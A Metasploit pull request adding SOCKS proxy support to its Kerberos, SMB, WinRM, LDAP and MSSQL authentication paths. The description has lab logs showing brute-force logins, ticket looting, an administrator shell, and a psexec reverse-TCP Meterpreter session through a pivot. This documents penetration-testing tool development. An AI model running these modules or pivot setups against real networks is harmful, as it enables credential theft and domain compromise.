### PR TITLE
Add proxies datastore support for kerberos workflows

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
+++ b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
@@ -15,7 +15,7 @@ Follow the steps in the [[Installing AD CS|ad-certificates/overview.md#installin
 
 ## Module usage
 
-The `admin/ldap/ad_cs_template` module is generally used to update a certificate template as part of an ESC4 attack.
+The `admin/ldap/ad_cs_cert_template` module is generally used to update a certificate template as part of an ESC4 attack.
 
 1. From msfconsole
 2. Do: `use auxiliary/admin/ldap/ad_cs_cert_template`

--- a/lib/metasploit/framework/login_scanner/winrm.rb
+++ b/lib/metasploit/framework/login_scanner/winrm.rb
@@ -2,6 +2,7 @@
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
 require 'metasploit/framework/login_scanner/http'
+require 'metasploit/framework/login_scanner/kerberos'
 
 module Metasploit
   module Framework

--- a/lib/metasploit/framework/mssql/client.rb
+++ b/lib/metasploit/framework/mssql/client.rb
@@ -60,6 +60,7 @@ module Metasploit
               host: domain_controller_rhost,
               hostname: hostname,
               mssql_port: rport,
+              proxies: proxies,
               realm: domain_name,
               username: user,
               password: pass,

--- a/lib/msf/core/exploit/remote/kerberos/auth_brute.rb
+++ b/lib/msf/core/exploit/remote/kerberos/auth_brute.rb
@@ -45,6 +45,7 @@ module Msf::Exploit::Remote::Kerberos::AuthBrute
     scanner = ::Metasploit::Framework::LoginScanner::Kerberos.new(
       host: self.rhost,
       port: self.rport,
+      proxies: datastore['Proxies'],
       server_name: "krbtgt/#{domain}",
       cred_details: cred_collection,
       stop_on_success: datastore['STOP_ON_SUCCESS'],

--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -69,6 +69,13 @@ module Msf
             "#{rhost}:#{rport}"
           end
 
+          # Returns the configured proxy list
+          #
+          # @return [String,nil]
+          def proxies
+            datastore['Proxies']
+          end
+
           # Creates a kerberos connection
           #
           # @param opts [Hash{Symbol => <String, Integer>}]
@@ -79,6 +86,7 @@ module Msf
             kerb_client = Rex::Proto::Kerberos::Client.new(
               host: opts[:rhost] || rhost,
               port: (opts[:rport] || rport).to_i,
+              proxies: opts[:proxies] || proxies,
               timeout: (opts[:timeout] || timeout).to_i,
               context:
                 {

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -37,6 +37,10 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   #   @return [Integer] the kerberos port to request a ticket from
   attr_reader :port
 
+  # @!attribute [r] host
+  #   @return [String,nil] The proxy directive to use for the socket
+  attr_reader :proxies
+
   # @!attribute [r] timeout
   #   @return [Integer] the kerberos timeout
   attr_reader :timeout
@@ -104,6 +108,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       username: nil,
       password: nil,
       host: nil,
+      proxies: nil,
       port: 88,
       timeout: 25,
       framework: nil,
@@ -121,6 +126,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @realm = realm
     @hostname = hostname
     @host = host
+    @proxies = proxies
     @port = port
     @timeout = timeout
     @username = username

--- a/lib/msf/core/exploit/remote/ldap.rb
+++ b/lib/msf/core/exploit/remote/ldap.rb
@@ -35,6 +35,7 @@ module Msf
 
       register_advanced_options(
         [
+          Opt::Proxies,
           *kerberos_storage_options(protocol: 'LDAP'),
           *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
           Msf::OptPath.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
@@ -74,6 +75,7 @@ module Msf
       connect_opts = {
         host: rhost,
         port: rport,
+        proxies: datastore['Proxies'],
         connect_timeout: datastore['LDAP::ConnectTimeout']
       }
 
@@ -126,6 +128,7 @@ module Msf
         kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
           host: datastore['DomainControllerRhost'],
           hostname: datastore['Ldap::Rhostname'],
+          proxies: datastore['Proxies'],
           realm: datastore['DOMAIN'],
           username: datastore['USERNAME'],
           password: datastore['PASSWORD'],

--- a/lib/msf/core/exploit/remote/mssql.rb
+++ b/lib/msf/core/exploit/remote/mssql.rb
@@ -354,6 +354,7 @@ module Exploit::Remote::MSSQL
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['Mssql::Rhostname'],
+        proxies: datastore['Proxies'],
         mssql_port: rport,
         realm: datastore['MssqlDomain'],
         username: datastore['username'],

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -160,6 +160,7 @@ module Msf
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
             host: datastore['DomainControllerRhost'],
             hostname: datastore['Smb::Rhostname'],
+            proxies: datastore['Proxies'],
             realm: datastore['SMBDomain'],
             username: datastore['SMBUser'],
             password: datastore['SMBPass'],

--- a/lib/msf/core/exploit/remote/winrm.rb
+++ b/lib/msf/core/exploit/remote/winrm.rb
@@ -67,6 +67,7 @@ module Exploit::Remote::WinRM
       endpoint: endpoint,
       host: rhost,
       port: rport,
+      proxies: datastore['Proxies'],
       uri: uri,
       ssl: ssl,
       transport: :rexhttp,
@@ -81,6 +82,7 @@ module Exploit::Remote::WinRM
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['Winrm::Rhostname'],
+        proxies: datastore['Proxies'],
         realm: datastore['DOMAIN'],
         username: datastore['USERNAME'],
         password: datastore['PASSWORD'],

--- a/lib/rex/proto/kerberos/client.rb
+++ b/lib/rex/proto/kerberos/client.rb
@@ -13,6 +13,9 @@ module Rex
         # @!attribute port
         #   @return [Integer] The kerberos server port
         attr_accessor :port
+        # @!attribute proxies
+        #   @return [String,nil] The proxy directive to use for the socket
+        attr_accessor :proxies
         # @!attribute timeout
         #   @return [Integer] The connect / read timeout
         attr_accessor :timeout
@@ -30,6 +33,7 @@ module Rex
         def initialize(opts = {})
           self.host = opts[:host]
           self.port     = (opts[:port] || 88).to_i
+          self.proxies  = opts[:proxies]
           self.timeout  = (opts[:timeout] || 10).to_i
           self.protocol = opts[:protocol] || 'tcp'
           self.context  = opts[:context] || {}
@@ -133,6 +137,7 @@ module Rex
           self.connection = Rex::Socket::Tcp.create(
             'PeerHost'   => host,
             'PeerPort'   => port.to_i,
+            'Proxies'    => proxies,
             'Context'    => context,
             'Timeout'    => timeout
           )

--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -80,6 +80,7 @@ class MetasploitModule < Msf::Auxiliary
         Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
           host: datastore['DomainControllerRhost'],
           hostname: datastore['Smb::Rhostname'],
+          proxies: datastore['Proxies'],
           realm: realm,
           username: username,
           password: password,
@@ -96,7 +97,7 @@ class MetasploitModule < Msf::Auxiliary
       port: rport,
       local_port: datastore['CPORT'],
       stop_on_success: datastore['STOP_ON_SUCCESS'],
-      proxies: datastore['PROXIES'],
+      proxies: datastore['Proxies'],
       bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
       connection_timeout: 5,
       max_send_size: datastore['TCP::max_send_size'],

--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -42,22 +42,24 @@ class MetasploitModule < Msf::Auxiliary
     endpoint = "#{schema}://#{rhost}:#{rport}#{uri}"
     opts = {
       endpoint: endpoint,
-        host: rhost,
-        port: rport,
-        uri: uri,
-        ssl: ssl,
-        transport: :rexhttp,
-        no_ssl_peer_verification: true,
-        operation_timeout: 1,
-        timeout: 20,
-        retry_limit: 1,
-        realm: datastore['DOMAIN']
+      host: rhost,
+      port: rport,
+      proxies: datastore['Proxies'],
+      uri: uri,
+      ssl: ssl,
+      transport: :rexhttp,
+      no_ssl_peer_verification: true,
+      operation_timeout: 1,
+      timeout: 20,
+      retry_limit: 1,
+      realm: datastore['DOMAIN']
     }
     case datastore['Winrm::Auth']
     when Msf::Exploit::Remote::AuthOption::KERBEROS
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['Winrm::Rhostname'],
+        proxies: datastore['proxies'],
         realm: datastore['DOMAIN'],
         username: datastore['USERNAME'],
         password: datastore['PASSWORD'],

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -54,6 +54,7 @@ class MetasploitModule < Msf::Auxiliary
         Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
           host: datastore['DomainControllerRhost'],
           hostname: datastore['Winrm::Rhostname'],
+          proxies: datastore['Proxies'],
           realm: realm,
           username: username,
           password: password,
@@ -74,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
     scanner = Metasploit::Framework::LoginScanner::WinRM.new(
       host: ip,
       port: rport,
-      proxies: datastore['PROXIES'],
+      proxies: datastore['Proxies'],
       cred_details: cred_collection,
       stop_on_success: datastore['STOP_ON_SUCCESS'],
       bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
@@ -110,6 +111,7 @@ class MetasploitModule < Msf::Auxiliary
               endpoint: endpoint,
               host: rhost,
               port: rport,
+              proxies: datastore['Proxies'],
               uri: uri,
               ssl: ssl,
               user: result.credential.public,


### PR DESCRIPTION
Closes https://github.com/rapid7/metasploit-framework/issues/18095

## Verification

Machines:

- 127.0.0.1 - Attacker VM
- 192.168.123.144 - Pivot, socks5 proxy
- 10.20.x.x - Remote DC3, not accessible to Attacker

Additionally ran on AttackerVM:

```
sudo iptables -A INPUT -d 10.20.0.0/24 -j DROP
sudo iptables -A OUTPUT -d 10.20.0.0/24 -j DROP
```

On the Pivot machine I just ran Metasploit's socks proxy module since it happened to have msfconsole installed

Test cases

- [x] Test kerberos login
```
msf6 auxiliary(scanner/kerberos/kerberos_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Using domain: ADF3.LOCAL - 10.20.0.128:88       ...
[+] 10.20.0.128 - User found: "administrator" with password p4$$w0rd5. Hash: $krb5asrep$18$administrator@ADF3.LOCAL:bcf5caf4918d5b1a814869fd1bcf62ee$e6b8c6b2674ae8148a142eb7843a56bb4898aa840c02a9f84de13cad7bae70f8b8a8d2c008b63ff7e8005a5cda254086f7a2a86ba8160e37345ea7c2efa13db83f2acd1e6ab5af32b557d35b56b88425149017b3322acee312cbba22d3a42c13ddb683d720b07d3e1cb7ec9a13896181893465f521b799dfe46835eb80ecd2b97626549ce0b1194e29cfd117e9359ffd20f5a3d771905b9d062448ed16388d990bbb5ceb3f2d3c5971939d5fe200d638c8e4e19f503472d0c814c876854d64bffc2797e92f081738364a376b29e9dd58c8bcb36c00e5123a5f7cbe66241919e6f07001edadccff7b022aa3063a15cbf3d73765fbfd1b853ab26a99
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed

```
- [x] Test winrm_login shell
```
msf6 auxiliary(scanner/winrm/winrm_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.128:88 - Received a valid TGT-Response
[*] 10.20.0.128:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_628045.bin
[+] 10.20.0.128:88 - Received a valid TGS-Response
[*] 10.20.0.128:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_605071.bin
[+] 10.20.0.128:88 - Received a valid delegation TGS-Response
[+] 10.20.0.128:88 - Received AP-REQ. Extracting session key...
[!] No active DB -- Credential data will not be saved!
[+] 10.20.0.128:5985 - Login Successful: adf3.local\administrator:p4$$w0rd5
[*] Command shell session 1 opened (192.168.123.132:39719 -> 192.168.123.144:1080) at 2023-07-07 06:06:56 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions

Active sessions
===============

  Id  Name  Type           Information                                    Connection
  --  ----  ----           -----------                                    ----------
  1         shell windows  WinRM administrator:p4$$w0rd5 (ADF3\administr  192.168.123.132:39719 -> 192.168.123.144:1080
                           ator)                                          (10.20.0.128)

msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (10.20.0.128)
adf3\administrator

```

- [X] Test winrm_cmd
```
msf6 auxiliary(scanner/winrm/winrm_cmd) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_482709.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_664214.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:88 - Received AP-REQ. Extracting session key...

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc3
   Primary Dns Suffix  . . . . . . . : adf3.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : adf3.local
                                       localdomain


```

- [X] Test smb login

```
msf6 auxiliary(scanner/smb/smb_login) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] 10.20.0.137:445       - 10.20.0.137:445 - Starting SMB login bruteforce
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130833_default_10.20.0.137_mit.kerberos.cca_042215.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130836_default_10.20.0.137_mit.kerberos.cca_683880.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:445       - 10.20.0.137:445 - Success: 'adf3.local\administrator:p4$$w0rd5' Administrator
[!] 10.20.0.137:445       - No active DB -- Credential data will not be saved!
[*] 10.20.0.137:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


```

- [X] Test psexec

```
msf6 exploit(windows/smb/psexec) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.132:4444 
[*] 10.20.0.137:445 - Connecting to the server...
[*] 10.20.0.137:445 - Authenticating to 10.20.0.137:445|adf3.local as user 'administrator'...
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130752_default_10.20.0.137_mit.kerberos.cca_594189.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130755_default_10.20.0.137_mit.kerberos.cca_385182.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] 10.20.0.137:445 - Selecting PowerShell target
[*] 10.20.0.137:445 - Executing the payload...
[+] 10.20.0.137:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.132:4444 -> 192.168.123.13:64956) at 2023-07-10 13:08:03 -0400

meterpreter > 
```

- [ ] Test MSSQL
- [x] Test LDAP - Kerberos tickets work (this PR) - but ldap_query client fails 🔴 Will fix in a separate issue
```
msf6 auxiliary(gather/ldap_query) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.137

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_426003.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_291783.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.137:389 Discovered base DN: DC=adf3,DC=local
[+] 10.20.0.137:389 Discovered schema DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-07-10 16:02:38 UTC

```
- [x] Test ADCS
```
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > rerun rhost=10.20.0.136 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.136 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.136

[+] 10.20.0.136:88 - Received a valid TGT-Response
[*] 10.20.0.136:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_270545.bin
[+] 10.20.0.136:88 - Received a valid TGS-Response
[*] 10.20.0.136:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_801301.bin
[+] 10.20.0.136:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.136:389 Discovered base DN: DC=adf3,DC=local
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*] Certificate template data written to: /home/kali/.msf4/loot/20230710062039_default_10.20.0.136_windows.ad.cs.te_131546.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*]   displayName:       User
[*]   objectGUID:        beea1d7d-241c-4b7d-a632-bac3ce1d3a9d
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4
[*]     * 1.3.6.1.5.5.7.3.4
[*]     * 1.3.6.1.5.5.7.3.2
[+] The operation completed successfully!
[*] Auxiliary module execution completed
```

```
msf6 auxiliary(admin/dcerpc/icpr_cert) > run rhost=10.20.0.137 smbuser=foo_user smbpass=p4$$w0rd5 ca=adf3-DC3-CA CERT_TEMPLATE=User proxies=socks5:192.168.123.144:1080
[*] Running module against 10.20.0.137

[+] 10.20.0.137:445 - The requested certificate was issued.                                                                                                                                               
[*] 10.20.0.137:445 - Certificate UPN: foo_user@adf3.local                                                                                                                                                
[*] 10.20.0.137:445 - Certificate stored at: /home/kali/.msf4/loot/20230710123835_default_10.20.0.137_windows.ad.cs_608294.pfx                                                                            
[*] Auxiliary module execution completed
```